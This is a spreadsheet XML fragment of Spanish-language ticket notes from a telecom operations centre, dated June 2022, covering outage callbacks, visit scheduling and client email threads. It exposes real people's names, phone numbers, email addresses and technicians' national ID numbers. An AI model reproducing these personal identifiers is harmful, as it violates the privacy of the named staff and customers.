    <t>**SE LLAMA AL CONTACTO DE PR 2272-5166 NO RESPONDE || SE INTENTARA LUEGO **
ID 3001750779
**</t>
  </si>
  <si>
    <t>F4604571</t>
  </si>
  <si>
    <t>SE HABLÓ CON SHERKY BARRERA/CLIENTE 54258062 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>F4604573</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FREDY AVILES AL 41545092  - 42105672 NO RESPONDE | AMBOS NUMEROS ENVIA A BUZON || SE
 INTENTARA LUEGO **
-ID 3001698092 -  3001698519
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FREDY AVILES 42105672 - 41545092 RESPONDE ENCARGADA DE TIENDA Y CONFIRMA QUE NO HAN PRESENTADO NINGUN INCONVENIENTE
-ID 3001708390 - 3001708596</t>
  </si>
  <si>
    <t>AL PARECER EQUIPOS QUEDARON INHIBIDOS, ES NECESARIO REALIZAR PRUEBAS---</t>
  </si>
  <si>
    <t>CLIENTE FREDY AGUILAR LLAMA DEL 42105672 ID 3001661810 PARA EL SEGUIMIENTO DEL CASO SD1135593 SE VALIDA QUE AUN ESTÁN REALIZANDO PRUEBAS LÓGICAS PERO EL CLIENTE COMENTA QUE EN LA VISITA QUE SE TUVO VALIDO CON EL TÉCNICO QUE ESTABA QUEMADO EL EQUIPO CISCO NO SABE QUE HICIERON Y AHORA NUEVAMENTE BRINDA LA AFECTACIÓN Y LE URGE SE LLAMA AL GESTOR A CARGO YENSI.CALGUA AL 8126 ID 3001663470 NO RESPONDEN Y SE PASAN LAS LLAMADAS ENTRE LOS MISMOS GESTORES SE ESCALA CON JUAN MANUEL CARDONA AL 41287321 ID 3001663694 SE LE COMENTA E  INFORMA QUE SE LLAME A LA EXT DE VINICIO Y NO LO BRINDA COMENTA QUE LO COMPARTIÓ SE LE SOLICITA Y COMENTA QUE SE CONSULTE CON EL SUPERVISOR, SE CONSULTA CON DIEGO AJIN QUIEN ESTA DE APOYO Y COMENTA QUE SE ESCALE CON ANABELLA SE LE LLAMA AL 41343209 ID 3001664347  COMENTA QUE EN EFECTO HAY QUE LLAMAR A LAS EXT QUE SE TIENEN EN EL DOCUMENTO QUE COMPARTIÓ, NO SE VALIDA EL DOCUMENTO Y SE LE SOLICITA APOYO A DIEGO NUEVAMENTE A COMPARTIR EL ARCHIVO PERO RESPONDE YENSI MEDIANTE SKYPE PARA EL CONTACTO AL 58059774 ID 3001666323</t>
  </si>
  <si>
    <t>F4604586</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 37608499 PARA SOLICITAR DATOS DE VISITA
-ID 3001701846
NOMBRE DEL CLIENTE: CASTROVILLARI, S.A.
UBICACIÓN:6A. AVENIDA 6-63 ZONA 10 NIVEL 14
HORARIO DE ATENCION:10 - 15:00 HRS
GESTIÓN DE PERMISOS: ADMINISTRADOR.IT@CONCEPTOSURBANOS.COM.GT   --- DATOS DE PERSONAL TECNICO</t>
  </si>
  <si>
    <t>SE ENVIA GESTION DE ACCESO A CLIENTE
GESTION DE ACCESOS F4604586 | 662900001T | CASTROVILLARI, S.A. | 6A. AVENIDA 6-63 ZONA 10 NIVEL 14
J
JONATHAN EDUARDO TEZEN MEJIA
PARA:ADMINISTRADOR.IT@CONCEPTOSURBANOS.COM.GT
CC:GRUPO N1;CNOCCA
VIE 17/06/2022 9:27
BUENA TARDE ESTIMADO CLIENTE,
   ES UN GUSTO SALUDARLE, EL PRESENTE ES PARA SOLICITAR DE SU AMABLE APOYO CON GESTIONAR ACCESOS A NUESTRA ÁREA TÉCNICA PARA VERIFICAR SERVICIO,
 F4604586 | 662900001T | CASTROVILLARI, S.A.  | 6A. AVENIDA 6-63 ZONA 10 NIVEL 14
AGRADECEMOS BRINDAR FECHA Y HORA DE VISITA
TÉCNICOS:
MARLON MUÑOZ  DPI 1582465001801
EN ESPERA DE SUS COMENTARIOS</t>
  </si>
  <si>
    <t>SE VALIDA COLA DE CORREOS Y SE OBSERVA RESPUESTA POR PARTE DE CLIENTE INDICANDO LA VISITA PARA LAS  13:00 PM
DE: EDWIN O. &lt;ADMINISTRADOR.IT@CONCEPTOSURBANOS.COM.GT&gt;
ENVIADO: VIERNES, 17 DE JUNIO DE 2022 11:43
PARA: JONATHAN EDUARDO TEZEN MEJIA &lt;JONATHAN.TEZENM@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: GESTION DE ACCESOS F4604586 | 662900001T | CASTROVILLARI, S.A. | 6A. AVENIDA 6-63 ZONA 10 NIVEL 14
POR FAVOR HOY A LA 1PM LOS ESPERAMOS, GRACIAS.</t>
  </si>
  <si>
    <t>F4604604</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 66209720 EXT 871084/113021 CALL ID 3001879916/879967 PARA VALIDAR SERVICIO, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE, TIEMPO DE MONITOREO HA FINALIZADO.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ESTUARDO VILLATORO 54141459  INDICA QUE AUN VE FUERA EL SERVICIO || SE NOTIFICA A GESTOR **
-ID 3001692543
**</t>
  </si>
  <si>
    <t>F4604611</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  ELSANIA AL 57576957  INDICA QUE HASTA LAS 9:00 ENTRAN A LABORAR QUE SE LE LLAME DESPUES DE LAS 9:00 **
-ID 3001692861
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  ELSANIA AL 57576957   CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 3001716963
**</t>
  </si>
  <si>
    <t>F4604615</t>
  </si>
  <si>
    <t>SE VALIDARÁ EQUIPOS DE UM Y TODO EL MEDIO, SE COORDINA VISITA TÉCNICA PARA MAÑANA A LAS 07:00AM A SOLICITUD DE CLIENTE.</t>
  </si>
  <si>
    <t>F4604621</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE SUP DE EJECUTIVOS DAVID LARRAÑAGA SOLICITANDO AVANCES, SE LE INFORMA SOBRE EL BLOQUEO ADIMINISTRATIVO DEL SERVICIO, COMENTA QUE LE DARA SEGUIMIENTO | TKT DEBE DE SER CERRADO E INFORMAR A QUIEN APERTURO EL TICKET QUE LE DEBE DE DAR SEGUIMIENTO CON EJECUTIVO | SE TERMINARA DE VALIDAR MEDIANTE SD | SE NOTIFICA A AXELS.LOPEZ VIA SKYPE PARA EL CIERRE | WIP
CORREO DE BLOQUEO:
RE: BLOQUEO TOTAL DEL SERVICIO NO. 732216 ID 925700002 TVA GUATEMALA,S.A.</t>
  </si>
  <si>
    <t>F4604622</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JIMMY AVELDAÑO  50688995384 ENVIA DIRECTO A BUZON, SE INTENTARA LUEGO QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001780816 - 3001781004</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JIMMY AVELDAÑO 506 88995384 ENVIA DIRECTO A BUZON
-ID 3001706824</t>
  </si>
  <si>
    <t>F4604656</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE RODOLFO QUIEN INDICA QUE EL PUEDE LLEGAR MAÑANA A LAS 8:00AM
SOLICITA QUE SE PROGRAME UNA VISITA TECNICA.
3001677649
COLA:
NOMBRE: A: 0050373961718
NÚMERO: 0050373961718
DURACIÓN: 0:01:19
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 0050373961718
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 16/06/2022 19:29:46</t>
  </si>
  <si>
    <t>F4604672</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE ALEXIS MORALES  55550306 CONFIRMA ACCESOS Y QUE LLEGUEN A LAS 5 PM EMPUNTO
3001842898
COLA:
NOMBRE: A: 55550306
NÚMERO: 55550306
DURACIÓN: 0:02:14
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 55550306
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 17/06/2022 16:10:08</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  FREDY GARCIA 55550306 MENCIONA QUE TIENE EN LINEA A OTRO COMPAÑERO, SE DEVOLVERA LA LLAMADA EN 15 MIN
-ID 1001151462</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE CLIENTE, FREDY GARCÍA , QUIEN INDICA QUE AUN PERSIBEN  LA INESTABILIDA DEL SERVICO,  SE PROCEDE A REVISAR Y NO SE OBSERVA LIMITANTE APLICADA EN EL PE Y EN SUS SALTOS ADYACENTES , CLIENTE INDICA QUE LLEVA CON EL PROBLEMA DESDE HACE 1 MES Y NO SE HA LOGRADO SOLVENTAR .
1001111433
COLA:
NOMBRE: DE: DIONICIO VELIZ CERON
NÚMERO: 7739
DURACIÓN: 0:18:03
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 7739
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: DIONICIO.VELIZ
FECHA Y HORA LOCALES: 20/06/2022 08:20:53</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  FREDY GARCIA 55550306 PARA SOLICITAR DATOS DE LA VISITA
-ID 1001159522
NOMBRE DEL CLIENTE: SUPER AUTOREPUESTOS  S.A.
UBICACIÓN:7 AVENIDA 1-54 ZONA 4
CONTACTO EN SITIO: ELISEO ECUN
HORARIO DE ATENCION:CLIENTE SOLICITA LA VISITA TECNICA LO MAS PRONTO POSIBLE
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS (PARQUEO ESTA A LA PAR DE LA TIENDA)</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FREDY GARCIA 22779713 MENCIONA QUE OBSERVA EL SERVICIO OPERATIVO Y ESTABLE
-ID 2001570765</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEXIS MORALES  55550306 QUIEN ACTUALMENTE VALIDA QUE SI EL SERVICIO ACTUALMENTE ESTA OPERATIVO Y ESTABLE.
ANTERIORMENTE CLIENTE PERSIBE INCONVENIETNES LUEGO 5 PM,
PERO HOY YA NO DIO ESE INCONVENIENTE.
CLIENTE SOLICITA CON PRIORIDAD QUE SE LE LLAME MAÑANA 8:30 AM  ALEXIS MORALES  55550306  PARA QUE SE VERIFIQUE EL SERVICIO, SE LE SUGIERE QUE CUANDO EL SERVICIO ESTÉ DANDO INCONVENENTES QUE DE MANERA LOGICA SE APAGUE PUERTO LAN YA SEA DE INTERNET O LAN DEL DE DATOS PARA VER SI ALGUNO ESTÉ DANDO INCONVENIENTES
OTRA OBSERVACION ES QUE EL CUANDO HAY INTERMITENCIA ES HACIA AMBOS SERVICIOS (INTERNET, DATOS) Y LO QUE COMPARTEN EN COMUN ES EL OP Y EL ETX-1, EN CASO VUELVA A DAR INVONCENIENTES SE VERIFICARA LA POSIBILIDAD DE CAMBIO
3001870119
COLA:
NOMBRE: A: 55550306
NÚMERO: 55550306
DURACIÓN: 0:10:55
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 55550306
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 17/06/2022 18:38:31</t>
  </si>
  <si>
    <t>F4604704</t>
  </si>
  <si>
    <t xml:space="preserve">
DE: ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 16 DE JUNIO DE 2022 20:58
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GARCIA GARCIA ROBERTO_26925739 &lt;GGARCIAR@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 30900009T ::: TICKET CNOC IMKEC000108 ::: LINK DOWN
BUENAS TARDES ESTIMADOS (A);
COMO PARTE DEL SEGUIMIENTO AL CASO SOLICITAMOS DE SU AMABLE APOYO PARA VALIDAR SI AÚN PERSISTEN LOS INCONVENIENTES PLANTEADOS SE OBSERVA ENLACE ACTIVO ALCANZABLE A NIVEL DE PING CON SALIDA HACIA INTERNET COMO SE MUESTRA EN LA FIGURA 1. GRACIAS DE ANTEMANO.
FIGURA 1. ENLACE ACTIVO CON SALIDA HACIA INTERNET.</t>
  </si>
  <si>
    <t>F4604729</t>
  </si>
  <si>
    <t>TICKET PENDIENTE POR ELABORACIÓN DEL RFO, LA SOLICITUD SE HIZO HOY, EN ESPERA DE LAS 48/72 HORAS HÁBILES, SE ESPERA TENERLO LA PRÓXIMA SEMANA:
ASUNTO: SOLICITUD DE RFO || TELEFONICA INTERNACIONAL WHOLESALE SERVICES, S.L. || F4604729 || 802700038T</t>
  </si>
  <si>
    <t>SE REENVÍA CORREO A CLIENTE SOLICITÁNDOLE APOYO PARA VALIDAR CIERRE DEL TICKET:
ASUNTO: RE: SOLICITUD DE SOPORTE // CAÍDA // TELXIUS TTK: CSE0029717</t>
  </si>
  <si>
    <t>SE ENVIA CORREO PARA LA ELABORACION DE DICTAMEN
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 17 DE JUNIO DE 2022 15:38
PARA: DICTAMENES &lt;DICTAMENES@CLARO.COM.GT&gt;
CC: DICTAMENESCC &lt;DICTAMENESCC@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; HUGO ALEJANDRO JUAREZ LOPEZ &lt;HUGOA.JUAREZ@CLARO.COM.GT&gt;; MARLON ESTUARDO RAMOS &lt;RAMOS.MARLON@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE RFO || TELEFONICA INTERNACIONAL WHOLESALE SERVICES, S.L. || F4604729 || 802700038T
BUENA TARDE
    SOLICITO DE SU APOYO CON LA ELABORACIÓN DE RFO CON LOS SIGUIENTES DATOS:
EMPRESA 	ID	TICKET
TELEFONICA INTERNACIONAL WHOLESALE SERVICES, S.L.
802700038T
F4604729   - SD1135874
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*-</t>
  </si>
  <si>
    <t>F4604782</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MELVIN AL 36434662 NO RESPONDE SE INTENTARA LUEGO **
-ID 3001693742
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS DONIS AL 30883941 NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001700425
**</t>
  </si>
  <si>
    <t>F4604825</t>
  </si>
  <si>
    <t>SE RESPONDE CORREO A CLIENTE
DE: LESTER LEONEL RODAS MARROQUIN &lt;LESTERL.RODAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 17 DE JUNIO DE 2022 13:57
PARA: ENRIQUEZ, ROLANDO &lt;ROLANDO.ENRIQUEZ@CITI.COM&gt;; GARITA, DAVID &lt;DAVID.GARITA@CITI.COM&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; CLIENTES VIP HN &lt;CLIENTES.VIP@CLARO.COM.HN&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; *O&amp;T HN CTI &amp; TECH &lt;CTI.TECHHND@CITI.COM&gt;; PERDOMO, ERICK &lt;ERICK.PERDOMO@CITI.COM&gt;; HERNANDEZ, AARON &lt;AARON.HERNANDEZ@CITI.COM&gt;
CC: SERVICENOW NOTIFICATIONS &lt;SERVICENOW.NOTIFICATIONS@CITI.COM&gt;; ECCNETOPS &lt;ECCNETOPS.NOTIFICATIONS@CITI.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; GARCIA ORTEGA, EDWARD MARTIN &lt;EDWARD.GARCIA@CLARO.COM.HN&gt;; CALL CENTER VIP &lt;CALLCENTER.VIP@CLARO.COM.HN&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; PIETRUSZKA, PIOTR &lt;PIOTR.PIETRUSZKA@CITI.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; NILLS LEIVA &lt;NLEIVA@GILDAN.COM&gt;
ASUNTO: RE: INC0105811443 || [SINGLE-THREADED - LATAM/HONDURAS - IN COUNTRY CONNECTIVITY SINGLE-THREADED DUE CLARO FAILURE - RHNBDK69-T4B01-4451&lt;&gt;RHNBEK75-T4B01-4451]
BUENA TARDE ESTIMADOS.
CON GUSTO COMPARTIMOS DE NUEVO LA INFORMACIÓN DEL PERSONAL ASIGNADO:
INDICARNOS DE SU LADO EN QUE MOMENTO PODEMOS LLEGAR PARA PODER DESPLAZAR AL PERSONAL.
SALUDOS.
DE: ENRIQUEZ, ROLANDO &lt;ROLANDO.ENRIQUEZ@CITI.COM&gt;
ENVIADO: VIERNES, 17 DE JUNIO DE 2022 13:20
PARA: GARITA, DAVID &lt;DAVID.GARITA@CITI.COM&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; CLIENTES VIP HN &lt;CLIENTES.VIP@CLARO.COM.HN&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; *O&amp;T HN CTI &amp; TECH &lt;CTI.TECHHND@CITI.COM&gt;; PERDOMO, ERICK &lt;ERICK.PERDOMO@CITI.COM&gt;; HERNANDEZ, AARON &lt;AARON.HERNANDEZ@CITI.COM&gt;
CC: SERVICENOW NOTIFICATIONS &lt;SERVICENOW.NOTIFICATIONS@CITI.COM&gt;; ECCNETOPS &lt;ECCNETOPS.NOTIFICATIONS@CITI.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; GARCIA ORTEGA, EDWARD MARTIN &lt;EDWARD.GARCIA@CLARO.COM.HN&gt;; CALL CENTER VIP &lt;CALLCENTER.VIP@CLARO.COM.HN&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; PIETRUSZKA, PIOTR &lt;PIOTR.PIETRUSZKA@CITI.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; NILLS LEIVA &lt;NLEIVA@GILDAN.COM&gt;
ASUNTO: RE: INC0105811443 || [SINGLE-THREADED - LATAM/HONDURAS - IN COUNTRY CONNECTIVITY SINGLE-THREADED DUE CLARO FAILURE - RHNBDK69-T4B01-4451&lt;&gt;RHNBEK75-T4B01-4451]
HOLA ESTIMADOS,
LA PERSONA EN SPS ES HENRY MATUTE, 50497742463. POR FAVOR, CONFIRMAR HORA DE VISITA Y LISTADO DE PERSONAS.
ATTE,</t>
  </si>
  <si>
    <t>***--- SE RESPONDE CORREO A CL SOLICITANDO CONTACTOS LOCALES Y ACLARANDO QUE DE MOMENTO NO PODEMOS PROGRAMAR VISITA --***
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: VIERNES, 17 DE JUNIO DE 2022 04:23
PARA: ZAVADA, YEVHEN &lt;YEVHEN.ZAVADA@CITI.COM&gt;
CC: SERVICENOW NOTIFICATIONS &lt;SERVICENOW.NOTIFICATIONS@CITI.COM&gt;; ECCNETOPS &lt;ECCNETOPS.NOTIFICATIONS@CITI.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTES VIP HN &lt;CLIENTES.VIP@CLARO.COM.HN&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; GARCIA ORTEGA, EDWARD MARTIN &lt;EDWARD.GARCIA@CLARO.COM.HN&gt;; CALL CENTER VIP &lt;CALLCENTER.VIP@CLARO.COM.HN&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; PIETRUSZKA, PIOTR &lt;PIOTR.PIETRUSZKA@CITI.COM&gt;; DANY RUBEN NUÑEZ SOTO &lt;DANY.NUNEZ@CLARO.COM.HN&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;
ASUNTO: RE: INC0105811443 || [SINGLE-THREADED - LATAM/HONDURAS - IN COUNTRY CONNECTIVITY SINGLE-THREADED DUE CLARO FAILURE - RHNBDK69-T4B01-4451&lt;&gt;RHNBEK75-T4B01-4451]
BUENOS DÍAS YEVHEN ZAVADA.
                LAMENTAMOS LOS INCONVENINETES, ACTUALMENTE ES NECESARIO QUE NOS COMPARTA SUS CONTACTOS LOCALES PARA REALIZAR DESCARTES DE PRIMER NIVEL.
DE MOMENTO NO ES NECESARIO DESPLAZAR PERSONAL DE NUESTRO LADO SIN HABER REALIZADO ESTOS DESCARTE, LAMENTAMOS LA CONFUSIÓN.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: ZAVADA, YEVHEN [MAILTO:YEVHEN.ZAVADA@CITI.COM]
ENVIADO EL: VIERNES, 17 DE JUNIO DE 2022 04:10
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CALL CENTER VIP &lt;CALLCENTER.VIP@CLARO.COM.HN&gt;; CLIENTES VIP HN &lt;CLIENTES.VIP@CLARO.COM.HN&gt;; GARCIA ORTEGA, EDWARD MARTIN &lt;EDWARD.GARCIA@CLARO.COM.HN&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; DANY RUBEN NUÑEZ SOTO &lt;DANY.NUNEZ@CLARO.COM.HN&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: SERVICENOW NOTIFICATIONS &lt;SERVICENOW.NOTIFICATIONS@CITI.COM&gt;; ECCNETOPS &lt;ECCNETOPS.NOTIFICATIONS@CITI.COM&gt;; PIETRUSZKA, PIOTR &lt;PIOTR.PIETRUSZKA@CITI.COM&gt;
ASUNTO: RE: INC0105811443 || [SINGLE-THREADED - LATAM/HONDURAS - IN COUNTRY CONNECTIVITY SINGLE-THREADED DUE CLARO FAILURE - RHNBDK69-T4B01-4451&lt;&gt;RHNBEK75-T4B01-4451]
HOLA,
PODRIAN INDICARNOS A CUAL SITIO NECESITAN A DESPLAZAR SUS TECNICOS? SITIO A O SITIO B?
SITE A. BOULEVARD MORAZAN, TEGUCIGALPA, EDIFICIO AGALTA, TEGUCIGALPA, FRANCISCO MORAZAN, 11101, HONDURAS, LATIN AMERICA
SITE B.  BO. RIO DE PIEDRAS, 18 AV. A, 9 Y 10, EDIFICIO EL PARQUE - SAN PEDRO SULA SITE, SAN PEDRO SULA, 00106-6000, HONDURAS, LATIN AMERICA</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DARWIN RODRIGUEZ 50431795257 Y SE DEJA EN LINEA CON GESTOR **
-ID 3001754932
**</t>
  </si>
  <si>
    <t>F4604864</t>
  </si>
  <si>
    <t>SE  GESTIONAN ACCESOS  PENDIETNE RESPEUSTA DE CLEITNE
RE: ENLACE CAÍDO DE DF SAN BENITO PETEN ID: 344400219
J
JONATHAN EDUARDO TEZEN MEJIA
PARA:CORPOWALMART;NOE PEREZ (VENDOR) &lt;NOE.PEREZ1@WALMART.COM&gt;;LUIS OVIDIO NORIEGA LARA;EDUARDO LUIS PINEDA ZELEDAY 2 MÁS
CC:CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;;GRUPO N1
VIE 17/06/2022 12:30
BUENA TARDE ESTIMADO CLIENTE,
   ES UN GUSTO SALUDARLE, EL PRESENTE ES PARA  SOLICITAR DE SU AMABLE APOYO CON GESTIONAR ACCESOS A NUESTRA ÁREA TÉCNICA PARA VERIFICAR SERVICIO,
 F4604864 | 8ª. AVENIDA 2-12 ZONA 2 BARRIO EL TREBOL SAN BENITO, PETÉN   |CC_WALMART_GT_TIENDA_4314
AGRADECEMOS BRINDAR FECHA Y HORA DE VISITA
TÉCNICOS:
LUIS MEJIA     DPI  1874 43165 1705
FRANCISCO ZEPEDA  DPI  2569 02305 1705
EN ESPERA DE SUS COMENTARIOS</t>
  </si>
  <si>
    <t>F4604883</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO A CL CON RESOLUCIÓN DEL CASO --***
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: VIERNES, 17 DE JUNIO DE 2022 04:16
PARA: LAZCANO MEJIA IRVIN YAIR &lt;ILMEJIA@UNINET.COM.MX&gt;; CARRILLO MONTERO JOSE ANGEL &lt;CMONTERJ@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 20559676PA ::: TICKET CNOC IMBBL004317 ::: "ENLACE FUERA DE SERVICIO"
BUENOS DÍAS ESTIMADO SR. LAZCANO.
                PERSONAL A CARGO NOS INDICA QUE SE OBSERVA LA CAÍDA DEL SERVICIO EN EL PUERTO UNI 1 Y NNI 1 DEL CPE EN SEDE POR POSIBLE MANIPULACIÓN DE CLIENTE FINAL.
PODRÍA INDICARNOS SI PODRÍAMOS CERRAR NUESTRO TICKET.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: LAZCANO MEJIA IRVIN YAIR [MAILTO:ILMEJIA@UNINET.COM.MX]
ENVIADO EL: VIERNES, 17 DE JUNIO DE 2022 04:05
PARA: EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; CARRILLO MONTERO JOSE ANGEL &lt;CMONTERJ@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 20559676PA ::: TICKET CNOC IMBBL004317 ::: "ENLACE FUERA DE SERVICIO"
ESTIMADOS, BUEN DÍA,
¿CONTARÁN CON ALGUNA NOVEDAD?
QUEDAMOS ATENTOS.
SALUDOS CORDIALES | KIND</t>
  </si>
  <si>
    <t>***--- CL INDICA QUE EL SERVICIO ESTA ACTIVO POR LO QUE CONSULTA QUE AFECTO EL SERVICIO Y SOLICITA LAS PRUEBAS --***
DE: CARRILLO MONTERO JOSE ANGEL [MAILTO:CMONTERJ@UNINET.COM.MX]
ENVIADO EL: VIERNES, 17 DE JUNIO DE 2022 02:37
PARA: EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 20559676PA ::: TICKET CNOC IMBBL004317 ::: "ENLACE FUERA DE SERVICIO"
BUEN DIA TEAM
OBSERVAMOS YA EL ENLACE ACTIVO, NOS AYUDAN A VALIDAR SI DETECTARON ALGUNA ALARMA. QUEDAMOS AL PENDIENTE DEL RFO.
SALUDOS/BEST REGARDS</t>
  </si>
  <si>
    <t>F4604911</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WALTER REYES AL 45787911 NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 3001694068
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER REYES 45787911 NO RESPONDE,  SE INTENTARA LUEGO
-ID 3001705246</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22696834 PERO SUENA DESCONECTADO
-ID 3001704141</t>
  </si>
  <si>
    <t>F4604912</t>
  </si>
  <si>
    <t>F4604942</t>
  </si>
  <si>
    <t>***---  CL CONFIRMA QUE ALCANZA LOS 3MB --*-*  Y SOLICITA MONITOREO A LAS 10:00  *--**
DE: GERALD TORRES (VENDOR) [MAILTO:GERALD.TORRES@WALMART.COM]
ENVIADO EL: VIERNES, 17 DE JUNIO DE 2022 04:29
